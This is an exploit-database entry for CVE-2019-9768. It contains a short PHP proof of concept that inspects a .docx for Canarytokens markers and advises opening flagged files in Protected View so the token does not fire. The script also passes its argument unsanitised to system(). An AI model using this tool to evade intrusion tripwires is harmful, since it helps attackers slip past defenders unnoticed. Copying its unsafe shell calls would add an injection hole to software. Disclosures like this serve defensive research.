Gionathan Reale1337DAY-ID-32403Canarytokens 2019-03-01 - Detection Bypass Exploit
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.216 Low
EPSS
Percentile
96.4%
## Exploit Title: Canarytokens 2019-03-01 - Detection Bypass
# Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale
# Vendor Homepage: https://thinkst.com/
# Version: up to 2019-03-01
# Software Link: https://github.com/thinkst/canarytokens
# Google Dork: N/A
# CVE: 2019-9768
#==================================================================================================================================================================================
# PoC:
#
#
#
# Requires unzip:
#
# sudo apt-get install unzip
#
#
<?php
system('unzip ' . $argv[1] . '.docx');
system('cp ' . $argv[1] . '.docx ./docProps/' . $argv[1] . '.docx && cd docProps');
$strFile = file_get_contents("docProps/core.xml");
if(strpos($strFile, 'AAAAAAAAAAAAAAAA')!=false && strpos($strFile, '2015-07-21')!=false && filesize( $argv[1] .".docx") < 170000 )
{
echo "This file probably contains a CanaryToken! Open it with Libreoffice/Microsoft Word Protected View to bypass detection";
}
else
{
echo "Should be safe to open normally";
}
?>
Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.216 Low
EPSS
Percentile
96.4%